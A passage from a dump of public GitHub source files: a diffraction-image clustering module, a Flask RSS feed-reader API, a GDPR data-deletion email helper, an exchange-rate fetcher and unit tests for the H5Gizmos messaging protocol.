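significant = significance_map(frame) > 4  # boolean map of ~4-sigma outliers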
This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n n_sigma:\n The number of standard deviations above the mean that a pixel\n needs to be to be considered significant.\n \"\"\"\n # Compute significance; return masked significance. Significant if\n # pixel is more than 4stddevs larger than the local average.\n significant_pixels = np.where(self._significance_levels(\n signal_length_scale, bkg_length_scale) > n_sigma, True, False)\n\n # If a mask was provided, use it.\n if significance_mask is not None:\n return np.logical_and(significant_pixels,significance_mask)\n return significant_pixels\n\n def mask_from_clusters(self, clusters: List[Cluster]) -> np.ndarray:\n \"\"\"\n Generates a mask array from clusters.\n\n Args:\n clusters:\n A list of the cluster objects that we'll use to generate our\n mask.\n\n Returns:\n A boolean numpy mask array.\n \"\"\"\n # Make an array of zeros of the correct size for this image; every\n # pixel is a mask by default.\n mask = np.full_like(self.image_array,False)\n\n for cluster in clusters:\n mask[cluster.pixel_indices[1], cluster.pixel_indices[0]] = True\n return mask\n\n def cluster(self,\n signal_length_scale: int,\n bkg_length_scale: int,\n n_sigma: float = 4,\n significance_mask: np.ndarray = None,\n frac_pixels_needed: float = 1/np.pi) -> List[Cluster]:\n \"\"\"\n Returns the clustered significant pixels. Does significance calculations\n here under the hood.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n n_sigma:\n The number of standard deviations above the mean that a pixel\n needs to be to be considered significant.\n significance_mask:\n Pixels that should never be considered to be statistically\n significant (useful if, for example, stats are biased in this\n region due to a physical barrier like a beamstop).\n frac_pixels_needed:\n The fraction of pixels within a distance of signal_length_scale\n of a pixel that need to also be statistically significant for\n the clustering algorithm to class that pixel as being a core\n point in a cluster. 
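# A small sketch of the DBSCAN step this docstring describes: cluster the
# (x, y) coordinates of significant pixels with eps set to the signal length
# scale. The random mask and the min_samples value are illustrative
# assumptions; the method itself derives min_samples from frac_pixels_needed.
import numpy as np
from sklearn.cluster import DBSCAN

signal_length_scale = 5
mask = np.random.default_rng(1).random((128, 128)) > 0.995  # stand-in mask
ys, xs = np.where(mask)
coords = np.column_stack([xs, ys]).astype(float)
labels = DBSCAN(eps=signal_length_scale,
                min_samples=signal_length_scale ** 2).fit(coords).labels_
# labels_ assigns -1 to noise points and 0..k-1 to the k clusters found.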
Defaults to 1/pi.\n \"\"\"\n # Do the significance calculation.\n significant_pixels = self._significant_pixels(\n signal_length_scale, bkg_length_scale, n_sigma, significance_mask)\n # Get the significant pixels.\n pixels_y, pixels_x = np.where(significant_pixels == True)\n\n # Massage these pixels into the form that sklearn wants to see.\n pixel_coords = np.zeros((len(pixels_x), 2))\n pixel_coords[:, 0] = pixels_x\n pixel_coords[:, 1] = pixels_y\n\n # If there are no significant pixels, return an empty list.\n if len(pixel_coords) == 0:\n return []\n\n # Run the DBSCAN algorithm, setting eps and min_samples according to our\n # expected signal_length_scale.\n dbscan = DBSCAN(\n eps=signal_length_scale,\n min_samples=frac_pixels_needed*np.pi*signal_length_scale**2\n ).fit(pixel_coords)\n\n return Cluster.from_DBSCAN(pixel_coords, dbscan.labels_)\n\n\nclass DiffractionImage(Image):\n \"\"\"\n A container for images obtained as a result of a diffraction experiment.\n \"\"\"\n\n def __init__(self, image_array: np.ndarray,\n beam_centre: Tuple[int]) -> None:\n super().__init__(image_array)\n raise NotImplementedError()\n self.beam_centre = beam_centre\n\n @property\n def _pixel_dx(self):\n \"\"\"\n Returns the horizontal distance between each pixel and the beamstop.\n \"\"\"\n horizontal_x = np.arange(0, self.image_array.shape[1])\n horizontal_dx = horizontal_x - self.beam_centre[0]\n pixel_dx = np.zeros_like(self.image_array)\n for col in range(self.image_array.shape[1]):\n pixel_dx[:, col] = horizontal_dx[col]\n\n return pixel_dx\n\n @property\n def _pixel_dy(self):\n \"\"\"\n Returns the vertical distance between each pixel and the beamstop.\n \"\"\"\n vertical_y = np.arange(self.image_array.shape[0]-1, -1, -1)\n vertical_dy = vertical_y - (\n self.image_array.shape[0] - 1 - self.beam_centre[1]\n )\n pixel_dy = np.zeros_like(self.image_array)\n for row in range(self.image_array.shape[0]):\n pixel_dy[row, :] = vertical_dy[row]\n\n return pixel_dy\n\n @property\n def pixel_radius(self):\n \"\"\"\n Returns each pixel's radial distance from the beam centre, in units of\n pixels.\n \"\"\"\n return np.sqrt(np.square(self._pixel_dx) + np.square(self._pixel_dy))\n\n @property\n def pixel_chi(self):\n \"\"\"\n Returns each pixel's azimuthal rotation for a polar coordinate mapping.\n This is equivalent to the typical diffraction motor chi.\n \"\"\"\n return np.arctan2(self._pixel_dx, self._pixel_dy)\n","repo_name":"RBrearton/local_stats","sub_path":"src/local_stats/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":13701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31762981423","text":"#!/usr/bin/env python3\nimport os, logging\nimport feed_reader\nimport asyncio\nimport datetime as dt\nfrom datetime import datetime\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request, url_for, render_template, jsonify\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_cors import CORS\nimport urllib\nfrom tabulate import tabulate\n\nloop = asyncio.get_event_loop()\napp = Flask(__name__)\nCORS(app)\nauth = HTTPBasicAuth()\n\ndef process_feeds(feeds):\n \"\"\"Modify feed data before passing to rendering\"\"\"\n prev_source = ''\n prev_date_str = ''\n for feed in feeds:\n summary_raw = feed[\"summary\"]\n soup = BeautifulSoup(summary_raw, \"html5lib\")\n summary = soup.get_text() # Strip html from summary\n \n date = datetime.strptime(feed[\"date\"], \"%a, %d %b %Y %H:%M:%S %z\")\n LOCAL_TIMEZONE = 
datetime.now(dt.timezone.utc).astimezone().tzinfo\n date = date.astimezone(LOCAL_TIMEZONE)\n date_str = date.strftime('%a %d %b')\n time_str = date.strftime(\"%H:%M\")\n\n if(date_str == prev_date_str):\n date_time_str = ''\n else:\n date_time_str = date.strftime('%a %d %b')\n\n prev_date_str = date_str\n\n source = feed[\"source\"]\n if source == prev_source:\n if not date_time_str:\n source = ''\n else:\n prev_source = source\n \n feed['summary'] = summary\n feed['time_str'] = time_str\n feed['date_time_str'] = date_time_str\n\n return feeds\n\n@app.route('/')\ndef simple_web_page(): \n response = ''\n try:\n feeds = feed_reader.get_stored_feeds(loop)\n\n feed_url_group = request.args.get('feed_url_group', '')\n if feed_url_group is not None:\n feed_urls = feed_reader.get_feed_urls(loop, feed_url_group)\n feeds = feed_reader.limit_feeds_to_group(loop, feeds, feed_urls)\n\n print('-- feeds --')\n print(feeds)\n print('-- ---- --')\n feeds = process_feeds(feeds)\n response = render_template('feeds.html', feeds=feeds) \n except Exception as e:\n msg = 'Sorry, feeds cannot be loaded at the moment.'\n details = 'Please try again later.'\n response = render_template('error.html', msg=msg, details=details)\n return response\n\n@app.route('/api/feed')\ndef feed_json():\n reload = request.args.get('reload')\n feed_url_group = request.args.get('feed_url_group', '')\n\n if reload:\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n feeds, feed_info = feed_reader.get_all_feeds(loop, feed_url_groups)\n feed_reader.store_feeds(feeds)\n feed_reader.store_feed_info(feed_info)\n else:\n feeds = feed_reader.get_stored_feeds(loop)\n\n if feed_url_group is not None:\n feed_urls = feed_reader.get_feed_urls(loop, feed_url_group)\n feeds = feed_reader.limit_feeds_to_group(loop, feeds, feed_urls)\n\n response = jsonify(feeds)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/api/feed_groups', methods=['GET', 'POST'])\ndef feed_groups():\n \"\"\"API endpoint for managing named groups of feed urls.\n \n GET returns the group info minus the feeds\n\n POST is used to clone an existing feed url group. 
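# Minimal sketch of the request-handling pattern these endpoints share: branch
# on request.method, accumulate (success, reason, data), and return JSON with
# an explicit CORS header. The route name and reason code are illustrative,
# not the app's actual endpoints.
from flask import Flask, jsonify, request

demo = Flask(__name__)

@demo.route('/api/demo_groups', methods=['GET', 'POST'])
def demo_groups():
    status, success, reason = 200, True, 'ok'
    if request.method == 'GET':
        data = {'group': request.args.get('feed_url_group', '')}
    else:
        body = request.get_json(silent=True) or {}
        group = body.get('new_group_name', '').strip()
        data = {'group': group}
        if not group:
            status, success, reason = 400, False, 'group-name-is-invalid'
    response = jsonify({'success': success, 'reason': reason, 'data': data})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response, status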
It is only possible\n to clone to a group that doesn't already exist.\n\n params:\n feed_url_group - The group to clone\n new_group_name - The new group name to clone to\n \"\"\"\n status = 200\n success = True\n reason = 'ok'\n resp = {}\n\n user = auth.username()\n\n if request.method == 'GET':\n get_selected_groups = request.args.get('get_selected_groups', False)\n\n if get_selected_groups:\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n \n group_info = {}\n\n for group in feed_reader.selected_groups:\n if group in feed_url_groups:\n group_info[group] = feed_url_groups[group]\n if feed_reader.is_locked_group(group) and not feed_reader.is_locker(user):\n group_info[group]['locked'] = True\n else:\n group_info[group]['locked'] = False\n else:\n feed_url_group = request.args.get('feed_url_group', '')\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n group_info = feed_url_groups.get(feed_url_group)\n\n if group_info:\n feeds = group_info['feeds']\n feed_info = feed_reader.get_feed_info(loop)\n group_info['feed_info'] = feed_info\n\n if feed_reader.is_locked_group(feed_url_group) and not feed_reader.is_locker(user):\n group_info['locked'] = True\n else:\n group_info['locked'] = False\n else:\n success = False\n status = 400\n reason = 'url-group-does-not-exist'\n\n elif request.method == 'POST':\n body = request.json\n\n feed_url_group = body.get('feed_url_group', '').strip()\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n group_info = feed_url_groups.get(feed_url_group)\n\n new_group_name = body.get('new_group_name', '').strip()\n new_group_exists = new_group_name in feed_url_groups\n new_group_is_locked = feed_reader.is_locked_group(new_group_name) and not feed_reader.is_locker(user)\n\n if not feed_reader.is_valid_group_name(new_group_name):\n success = False\n status = 400\n reason = 'group-name-is-invalid'\n elif new_group_exists:\n success = False\n status = 400\n reason = 'new-url-group-already-exists'\n elif new_group_is_locked:\n success = False\n status = 400\n reason = 'new-url-group-is-locked'\n else:\n group_info, success, reason = feed_reader.clone_group(feed_url_groups, \n feed_url_group, \n new_group_name)\n\n response = jsonify({'success': success, 'reason': reason, 'data': group_info})\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response, status\n\n@app.route('/api/feed_urls', methods=['GET', 'POST', 'DELETE'])\ndef feed_urls():\n \"\"\"API endpoint for managing list of feed urls.\n\n Takes a feed_url_group string to determine which group to add the feed to.\n\n Returns json in format: {\n 'success': true/false,\n 'reason': string,\n 'data': [string, string, ...]\n }\n\n GET reason: ok\n POST reason: ok, no-data-from-feed, url-exists, max-feeds-10, timeout, url-group-does-not-exist\n DELETE reason: ok, url-does-not-exist, url-group-does-not-exist\n \"\"\"\n status = 200\n success = True\n reason = 'ok'\n resp = {}\n\n user = auth.username()\n\n if request.method == 'GET':\n feed_url_group = request.args.get('feed_url_group', '').strip()\n resp = feed_reader.get_feed_urls(loop, feed_url_group)\n elif request.method == 'POST':\n body = request.json\n feed_url = body['feed_url']\n feed_url_group = body.get('feed_url_group', '').strip()\n\n if not feed_reader.is_valid_group_name(feed_url_group):\n success = False\n status = 400\n reason = 'group-name-is-invalid'\n else:\n feed, feed_infos, success, reason = feed_reader.add_feed_url(loop, feed_url, feed_url_group, user)\n\n resp['feeds'] = feed\n resp['feed_info'] = 
feed_infos\n\n if success:\n status = 201\n else:\n status = 400\n\n elif request.method == 'DELETE':\n body = request.json\n feed_url = body['feed_url']\n feed_url_group = body.get('feed_url_group', '')\n resp, success, reason = feed_reader.delete_feed_url(loop, feed_url, feed_url_group, user)\n \n if not success:\n status = 400\n\n response = jsonify({'success': success, 'reason': reason, 'data': resp})\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response, status\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ben-razor/birdfeed","sub_path":"web_py/feed_web.py","file_name":"feed_web.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16775955771","text":"#!/usr/bin/env python\nimport json\nimport urllib\nimport urllib.parse\n\nTYPE_JOB_WEBSITE = \"job website\"\nTYPE_RECRUITER = \"recruiter\"\n\n# set company names as exclusions - those you don't want to contact\nexclusions = []\n\ncompanies = {\n\t\"cwjobs\": {\n\t\t\"type\": TYPE_JOB_WEBSITE,\n\t\t\"website\": \"https://www.cwjobs.co.uk\",\n\t\t\"data_controller\": \"Totaljobs\",\n\t\t\"email\": \"dataprotectionofficerUK@stepstone.co.uk\"\n\t},\n\t\"modis\": {\n\t\t\"type\": TYPE_RECRUITER,\n\t\t\"email\": \"privacy@modis.co.uk\"\n\t},\n\t\"reed\": {\n\t\t\"type\": TYPE_JOB_WEBSITE,\n\t\t\"website\": \"https://www.reed.co.uk\",\n\t\t\"email\": \"dpo@reedonline.co.uk\"\n\t}\n}\n\n################################################################################\n\npersonal_data = json.load(open(\".personal-data.json\"))\nprint(personal_data)\n\nemail_bccs = []\nfor company in companies:\n\tif company in exclusions:\n\t\tprint(\"Company %s excluded, skipping\" % company)\n\t\tcontinue\n\tprint(company)\n\temail_bccs.append(companies[company][\"email\"])\n\nprint(email_bccs)\nemail_bccs_string = ','.join(email_bccs)\n\nbody = urllib.parse.quote_plus(f\"\"\"{personal_data[\"full_name\"]}, {personal_data[\"address\"]}\n\nPlease delete any data you hold for me.\nFurther to this, please let me know any other parties you may have shared my data with in the last three months.\nIf possible I would also appreciate if you contacted them on my behalf, asking them to delete my data.\n\nThanks,\n{personal_data[\"full_name\"]}\n\"\"\")\nsubject = urllib.parse.quote_plus(\"Personal data deletion\")\nto_address = personal_data[\"email\"]\nprint(f'https://mail.google.com/mail/?view=cm&fs=1&to={to_address}&bcc={email_bccs_string}&su={subject}&body={body}')\n","repo_name":"james-portman/personal-data-deletion","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24428933141","text":"import requests\nfrom datetime import date, datetime, timedelta\nimport time\n# HEADERS = {'user-agents': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36', 'accept': '*/*'}\n\n# url = 'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json'\n# valcode = str(input('Currency you need: '))\n# url = str(f'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?valcode={valcode}&json')\n\n\n# def cur(cc):\n# response = requests.get(url)\n# resp_data = response.json()\n# n = len(resp_data)\n# temp = []\n# result = 'none'\n# for i in range(0, n):\n# temp = resp_data[i]\n# cc_val = temp.get('cc')\n# if cc_val.lower() == 
cc.lower():\n# result = temp.get('txt')\n# break\n# return result\nBASE_URL = f'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?'\n\ndef timer(func):\n def wrapper(*args):\n start = time.time()\n print('start time', start)\n target = func(*args)\n end = time.time()\n print('end time', end)\n print('timer.Function execution time in seconds:', round(end - start, 6))\n print('timer.Function executed')\n print(func(*args))\n\n return wrapper\n\n\n@timer\ndef exchange(cur):\n url = str(f'{BASE_URL}valcode={cur}&json')\n resp = requests.get(url).json()[0]\n return resp['cc'], resp['txt'], resp['rate'],resp['exchangedate']\n\ndef exchange(cur):\n url = str(f'{BASE_URL}valcode={cur}&json')\n resp = requests.get(url).json()[0]\n result = resp['cc'], resp['txt'], resp['rate']\n return result\n\nprint(exchange('usd'))\n\n\n# yyyymmdd, де yyyy - рік, mm - місяць, dd - день\n\n# def cur_7(c):\n# today = date.today()\n# minus_day = timedelta(days=+1)\n# result = []\n# result.append(str(today).replace('-', ''))\n# for i in range(7):\n# today = today-minus_day\n# result.append(str(today).replace('-', ''))\n\n\n# def cur_7(cc, days = 7):\n# today = date.today()\n# minus_day = timedelta(days=-1)\n# result = []\n# result.append(str(today).replace('-', ''))\n# for i in range(days-1):\n# today +=minus_day\n# result.append(str(today).replace('-', ''))\n# fin=[]\n# for j in result:\n# url = str(f'{BASE_URL}valcode={cc}&date={j}&json')\n# resp = requests.get(url).json()[0]\n# fin.append(resp)\n# print(fin)\n# return fin\n# for f in range(1, days+1):\n# print(f\"{fin[-f]['exchangedate']} ** {fin[-f]['cc']} ({fin[-f]['txt']}) ** {fin[-f]['rate']}\")\n\n#\n# def cur_all_data():\n# response = requests.get(f'{BASE_URL}json').json()\n# result =''\n# for i in range(len(response)):\n# result+= f\"{response[i]['cc']} >>> {response[i]['txt']} >>> {response[i]['rate']}\\n\"\n# return result\n#\n#\n# print(cur_all_data())\n\n#\n# print(today)\n# date=20200522\n# def exchange(cur):\n# url = str(f'{BASE_URL}valcode={cur}&date={date}&json')\n# resp = requests.get(url).json()[0]\n# return resp['cc'], resp['txt'], resp['rate'],resp['exchangedate']\n#\n# print(exchange('usd'))\n\n# https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?valcode=EUR&date=20200302&json\n\n# print(url)\n# rate = (dict(response.json()[0]))\n# print(rate.get('rate', 'No value found'))\n\n\n\n# if response:\n# print('Success!')\n# else:\n# print('Not Found.')\n#\n# # status code\n# print(response.status_code)\n#\n# # content\n# print(response.content)\n#\n# # text\n# print(response.text)\n#\n# # json\n# print(response.json())\n#\n# # headers\n# print(response.headers)\n# print(response.headers['Content-Type'])\n#\n# # Content-Type\n# print(response.headers['Content-Type'])\n#\n# https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json\n#\n# rate = (dict(response.json()[0]))\n# print(rate)\n# print(rate.get('rate', 'No value found'))\n# print(rate.get('cc', 'No value found'))\n# print(rate.get('exchangedate'))","repo_name":"agornovych/study_python","sub_path":"Requests.py","file_name":"Requests.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42028984378","text":"\n\n# Requires python 3.8\n# Run from setup folder:\n# nosetests --with-coverage --cover-html --cover-package=H5Gizmos --cover-erase --cover-inclusive\n\nimport unittest\n\nimport numpy as np\nimport json\n\nfrom H5Gizmos.python.gz_parent_protocol import (\n 
Gizmo, \n GZ,\n GizmoLiteral,\n JavascriptEvalException,\n NoSuchCallback,\n GizmoLink,\n GizmoReference,\n CantConvertValue,\n NoRequestForOid,\n BadResponseFormat,\n GizmoPacker,\n FINISHED_UNICODE,\n CONTINUE_UNICODE,\n BadMessageIndicator,\n JsonCodec,\n GZPipeline,\n schedule_task,\n TooManyRequests,\n ValueConverter,\n)\n\n'''\nclass TestFails(unittest.TestCase):\n\n def test_fail(self):\n self.assertEqual(1, 0)\n'''\n\ndef dummy_request(id=\"1234\"):\n \"fake web socket request interface to make tests work.\"\n class url:\n query = {Gizmo.RECONNECT_ID: id}\n class request:\n _rel_url = url\n return request\n\nclass GizmoWrapper:\n\n def __init__(self, default_depth=5):\n self.sent_data = []\n self.G = Gizmo(self.send, default_depth)\n\n def send(self, object):\n self.sent_data.append(object)\n\ndef _lit(json_ob):\n return [GZ.LITERAL, json_ob]\n\ndef _call(callable_cmd, args):\n return [GZ.CALL, callable_cmd, args]\n\ndef _ref(identity):\n return [GZ.REFERENCE, identity]\n\ndef _get(target_cmd, index_cmd):\n return [GZ.GET, target_cmd, index_cmd]\n\ndef _seq(cmds):\n return [GZ.SEQUENCE, cmds]\n\ndef _map(mapping):\n return [GZ.MAP, mapping]\n\ndef _callback(oid, to_depth):\n return [GZ.CALLBACK, oid, to_depth]\n\ndef _bytes(hex):\n return [GZ.BYTES, hex]\n\ndef get_msg(oid, cmd, to_depth):\n return [GZ.GET, oid, cmd, to_depth]\n\ndef exec_msg(cmd):\n return [GZ.EXEC, cmd]\n\ndef connect_msg(id, cmd):\n return [GZ.CONNECT, id, cmd]\n\ndef disconnect_msg(id):\n return [GZ.DISCONNECT, id]\n\nclass FakeWebSocketResponse:\n\n _prepared = False\n _sent = None\n _closed = False\n\n def __init__(self):\n ##p(\"init\", self)\n #self._messages = messages\n #if messages:\n # raise ValueError(\"please use append\", messages)\n self._messages = []\n self._index = 0\n #p(\"init\", self)\n\n def __repr__(self) -> str:\n return \"resp\" + repr([self._index, self._messages])\n\n def append(self, msg):\n #p(\"append\", self, msg)\n self._messages.append(msg)\n\n def __aiter__(self):\n #p(\"in aiter\", self)\n return self\n\n async def __anext__(self):\n #p(\"in anext\", self)\n i = self._index\n self._index += 1\n msgs = self._messages\n if i >= len(msgs):\n #p(\"stopping\", self)\n raise StopAsyncIteration\n result = msgs[i]\n #p(\"anext=\", result)\n return result\n\n async def prepare(self, request):\n self._prepared = True\n self._request = request\n self._sent = []\n\n async def send_str(self, unicode_str):\n self._sent.append(unicode_str)\n\n async def drain(self, *arguments):\n pass # do nothing\n\nclass FakeWebSocketConnection:\n\n def __init__(self, messages_to_send):\n ws = FakeWebSocketResponse()\n self.ws = ws\n for message in messages_to_send:\n ws.append(message)\n\n def get_web_socket(self):\n return self.ws\n\nclass FakeWebSocketMessage:\n\n def __init__(self, typ, data):\n self.type = typ\n self.data = data\n\n def __repr__(self):\n return \"msg\" + repr((self.type, self.data))\n\ndef FakeWebSocketUnicodeMessages(unicode_strings, msg_type=GZPipeline.MSG_TYPE_TEXT):\n messages = []\n for ustr in unicode_strings:\n msg = FakeWebSocketMessage(msg_type, ustr)\n messages.append(msg)\n cnx = FakeWebSocketConnection(messages)\n return cnx\n\nclass TestGizmo(unittest.TestCase):\n\n def test_converts_None_in_dict(self):\n import numpy as np\n D = dict(key=None)\n converted = ValueConverter(D, None)\n assert converted.is_literal\n DC = converted.command._value\n self.assertEqual(DC, D)\n\n def test_converts_float32_in_dict(self):\n import numpy as np\n a = np.array([42.3], dtype=np.float32)\n 
D = dict(key=a[0])\n self.assertEqual(type(D[\"key\"]), np.float32)\n converted = ValueConverter(D, None)\n assert converted.is_literal\n DC = converted.command._value\n self.assertEqual(type(DC[\"key\"]), float)\n\n def test_converts_float32_in_list(self):\n import numpy as np\n a = np.array([42.3], dtype=np.float32)\n L = [a[0]]\n self.assertEqual(type(L[0]), np.float32)\n converted = ValueConverter(L, None)\n assert converted.is_literal\n LC = converted.command._value\n self.assertEqual(type(LC[0]), float)\n\n def test_calls_callback(self):\n data = []\n def callback_function(*args):\n data.append(args)\n GW = GizmoWrapper()\n G = GW.G\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n G._receive(json_msg)\n self.assertEqual(data, [tuple(arguments)])\n\n def test_no_such_callback(self):\n data = []\n def callback_function(*args):\n data.append(args)\n GW = GizmoWrapper()\n G = GW.G\n oid = G._register_callback(callback_function)\n oid = \"nope:\" + oid # make an invalid oid\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n with self.assertRaises(NoSuchCallback):\n G._receive(json_msg)\n self.assertEqual(data, [tuple(arguments)])\n\n def test_ref_attr_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someObject\", G)\n getatr = ref.attribute\n getatr._exec()\n expected = exec_msg(_get(_ref(\"someObject\"), _lit(\"attribute\")))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_item_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someObject\", G)\n getatr = ref[\"attribute\"]\n getatr._exec()\n expected = exec_msg(_get(_ref(\"someObject\"), _lit(\"attribute\")))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", 1)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(1)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_list_literal(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n the_list = [1, \"two\"]\n call = ref(\"abc\", the_list)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(the_list)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_dict_literal(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n the_dict = {\"hello\": \"world\"}\n call = ref(\"abc\", the_dict)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(the_dict)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_list_ref(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n ref2 = GizmoReference(\"someObject\", G)\n the_list = [1, ref2]\n the_list_cmd = _seq([_lit(1), _ref(\"someObject\")])\n call = ref(\"abc\", the_list)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), the_list_cmd]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_dict_ref(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n ref2 = GizmoReference(\"someObject\", G)\n the_dict = {\"hello\": ref2}\n the_dict_cmd = _map({\"hello\": _ref(\"someObject\")})\n call = ref(\"abc\", the_dict)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), 
[_lit(\"abc\"), the_dict_cmd]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_execs_literal(self, detail=False):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n lit._exec(detail)\n expected = exec_msg(_lit(json_ob))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_exec_literal_detail(self):\n return self.test_execs_literal(detail=True)\n\n def test_requests_connection(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n identifier = \"window\"\n cnx = lit._connect(identifier)\n expected = connect_msg(identifier, _lit(json_ob))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_requests_connection_then_disconnect(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n identifier = \"window\"\n cnx = lit._connect(identifier)\n expected_connect = connect_msg(identifier, _lit(json_ob))\n cnx._disconnect()\n expected_disconnect = disconnect_msg(identifier)\n self.assertEqual(GW.sent_data, [expected_connect, expected_disconnect])\n\n def test_raises_not_implemented(self):\n X = GizmoLink()\n with self.assertRaises(NotImplementedError):\n X._command(to_depth=10)\n with self.assertRaises(NotImplementedError):\n X._get_id()\n\n def test_wraps_callable(self):\n def example_callable(x):\n return x + 1\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_callable)\n call._exec()\n #self.assertEqual(G._callable_to_oid, None)\n oid = G._callable_to_oid[example_callable]\n cb_json = _callback(oid, G._default_depth)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), cb_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_converts_bytes(self):\n example_bytes = bytearray([1,2,3])\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_bytes)\n call._exec()\n hex = \"010203\"\n bytes_json = _bytes(hex)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), bytes_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_converts_array(self):\n L = [100, 200, 300]\n example_array = np.array(L)\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_array)\n call._exec()\n hex = \"010203\"\n array_json = _lit(L)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), array_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_unconvertible(self):\n cant_convert = np\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n with self.assertRaises(CantConvertValue):\n call = ref(\"abc\", cant_convert)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\")]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_no_request_for_oid(self):\n GW = GizmoWrapper()\n G = GW.G\n oid = \"oid123_doesn't exist\"\n json_ob = [1, \"two\", 3]\n get_response = [GZ.GET, oid, json_ob]\n with self.assertRaises(NoRequestForOid):\n G._receive(get_response)\n\n def test_dont_receive_maps(self):\n GW = GizmoWrapper()\n G = GW.G\n get_response = {\"a\": \"mapping\"}\n with self.assertRaises(BadResponseFormat):\n G._receive(get_response)\n\n def test_bad_indicator(self):\n GW = GizmoWrapper()\n G = GW.G\n get_response = [\"nonsense\", \"reply\"]\n with self.assertRaises(BadResponseFormat):\n G._receive(get_response)\n\n def test_receive_chunks(self):\n packets_processed = []\n 
